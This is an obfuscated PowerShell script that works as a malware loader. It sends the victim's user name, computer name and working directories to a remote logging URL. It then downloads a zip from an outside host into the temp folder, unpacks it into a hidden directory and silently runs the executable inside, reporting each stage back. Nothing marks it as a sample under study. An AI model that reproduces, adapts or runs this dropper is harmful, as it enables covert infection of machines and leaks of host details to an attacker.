function saozqko_cbhwqf51l9svlt1fewwyn62ufqkbaf9($event, $note="", $path="", $file="") { $endpoint = 'https://testdomainffp.com' + '/aurunlog?id=' + $mlaedzen_umnzxpj_qqyb78okgsqnfy265sxj7v3 + '&s=' + $event $queryParams = @( '&user=' + [System.Uri]::EscapeDataString($wqlhqik_bvcsgdro_tthcuswky), '&pc=' + [System.Uri]::EscapeDataString($mvrectril_lipgda_tma1_xasim), '&cwd=' + [System.Uri]::EscapeDataString($path), '&noise=' + (Get-Random -Minimum 5000 -Maximum 15000) ) if ($file -and $file -ne $null) { $queryParams += '&exe_name=' + [System.Uri]::EscapeDataString($file) } if ($note -and $note -ne $null) { $queryParams += '&msg=' + [System.Uri]::EscapeDataString($note) } $fullUri = $endpoint + ($queryParams -join '') try { $null = Invoke-WebRequest -Uri $fullUri -Method GET -UseBasicParsing -TimeoutSec 5 } catch { } } $mlaedzen_umnzxpj_qqyb78okgsqnfy265sxj7v3 = '6bd07cb3-003d-4370-86d2-ef900e3870cc' $wqlhqik_bvcsgdro_tthcuswky = $env:USERNAME $mvrectril_lipgda_tma1_xasim = $env:COMPUTERNAME & saozqko_cbhwqf51l9svlt1fewwyn62ufqkbaf9 'check_system_ok' '' $env:TEMP $null Add-Type -AssemblyName System.IO.Compression.FileSystem $fjoyio_wfihzpax_bb = 'https://booking.testdomainffp.com/summguponny.zip' $pahebymig_hir_fdoywx8_rwxgojr = "$env:TEMP\cykltr1__aurun.zip" $ibkcz_xdpa_hwpgx9gqrt1 = $false $xaxcrpcha_ilcputfafnx = $null [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 -bor [System.Net.SecurityProtocolType]::Tls13 try { $progressPreference = 'SilentlyContinue' Invoke-WebRequest -Uri $fjoyio_wfihzpax_bb -OutFile $pahebymig_hir_fdoywx8_rwxgojr -UserAgent "Mozilla/5.0" -UseBasicParsing -TimeoutSec 30 if (Test-Path $pahebymig_hir_fdoywx8_rwxgojr) { $fileInfo = Get-Item $pahebymig_hir_fdoywx8_rwxgojr if ($fileInfo.Length -gt 10240) { $ibkcz_xdpa_hwpgx9gqrt1 = $true & saozqko_cbhwqf51l9svlt1fewwyn62ufqkbaf9 'download_ok' '' "$env:TEMP" $null } else { Remove-Item $pahebymig_hir_fdoywx8_rwxgojr -Force $xaxcrpcha_ilcputfafnx = "FileTooSmall" & saozqko_cbhwqf51l9svlt1fewwyn62ufqkbaf9 'download_fail' $xaxcrpcha_ilcputfafnx "$env:TEMP" $null exit 1 } } } catch { $xaxcrpcha_ilcputfafnx = $_.Exception.Message & saozqko_cbhwqf51l9svlt1fewwyn62ufqkbaf9 'download_fail' $xaxcrpcha_ilcputfafnx "$env:TEMP" $null exit 1 } if (-not $ibkcz_xdpa_hwpgx9gqrt1) { exit 1 } $pepr_zzyvbub6_pikvwdrdfq3b2 = "$env:TEMP\sys_init_aurun_" + [System.Guid]::NewGuid().ToString().Substring(0,8) $xaxcrpcha_ilcputfafnx = $null try { $null = New-Item -Path $pepr_zzyvbub6_pikvwdrdfq3b2 -ItemType Directory -Force [System.IO.Compression.ZipFile]::ExtractToDirectory($pahebymig_hir_fdoywx8_rwxgojr, $pepr_zzyvbub6_pikvwdrdfq3b2) # Разблокировка файлов Get-ChildItem $pepr_zzyvbub6_pikvwdrdfq3b2 -Recurse -File | ForEach-Object { $_.Attributes = $_.Attributes -band (-bnot [IO.FileAttributes]::ReadOnly) } Set-ItemProperty -Path $pepr_zzyvbub6_pikvwdrdfq3b2 -Name Attributes -Value 'Hidden' & saozqko_cbhwqf51l9svlt1fewwyn62ufqkbaf9 'unzip_ok' $null $pepr_zzyvbub6_pikvwdrdfq3b2 $null Remove-Item $pahebymig_hir_fdoywx8_rwxgojr -Force -ErrorAction SilentlyContinue } catch { $xaxcrpcha_ilcputfafnx = $_.Exception.Message if (Test-Path $pepr_zzyvbub6_pikvwdrdfq3b2) { Remove-Item $pepr_zzyvbub6_pikvwdrdfq3b2 -Recurse -Force -ErrorAction SilentlyContinue } & saozqko_cbhwqf51l9svlt1fewwyn62ufqkbaf9 'unzip_fail' $xaxcrpcha_ilcputfafnx $null $null exit 1 } if (-not (Test-Path $pepr_zzyvbub6_pikvwdrdfq3b2)) { exit 1 } $nulf_crxzckoft9_smas = Get-ChildItem -Path $pepr_zzyvbub6_pikvwdrdfq3b2 -Filter "*.exe" -Recurse | Select-Object -First 1 if (-not $nulf_crxzckoft9_smas) { & saozqko_cbhwqf51l9svlt1fewwyn62ufqkbaf9 'run_fail' 'No EXE found' $pepr_zzyvbub6_pikvwdrdfq3b2 $null exit 1 } $oeqbunojj_nxbmuw_awtcbzxzn_fnbj = $nulf_crxzckoft9_smas.FullName $zwdxytye_cdbsor_rsyusez_tkg = Split-Path $oeqbunojj_nxbmuw_awtcbzxzn_fnbj $iwrmuog7_vglh_phpnbvqzq459cu = Split-Path $oeqbunojj_nxbmuw_awtcbzxzn_fnbj -Leaf try { $proc = Start-Process -FilePath $oeqbunojj_nxbmuw_awtcbzxzn_fnbj -WorkingDirectory $zwdxytye_cdbsor_rsyusez_tkg -WindowStyle Hidden -PassThru -ErrorAction Stop & saozqko_cbhwqf51l9svlt1fewwyn62ufqkbaf9 'run_ok' $proc.Id $zwdxytye_cdbsor_rsyusez_tkg $iwrmuog7_vglh_phpnbvqzq459cu } catch { & saozqko_cbhwqf51l9svlt1fewwyn62ufqkbaf9 'run_fail' $_.Exception.Message $zwdxytye_cdbsor_rsyusez_tkg $iwrmuog7_vglh_phpnbvqzq459cu }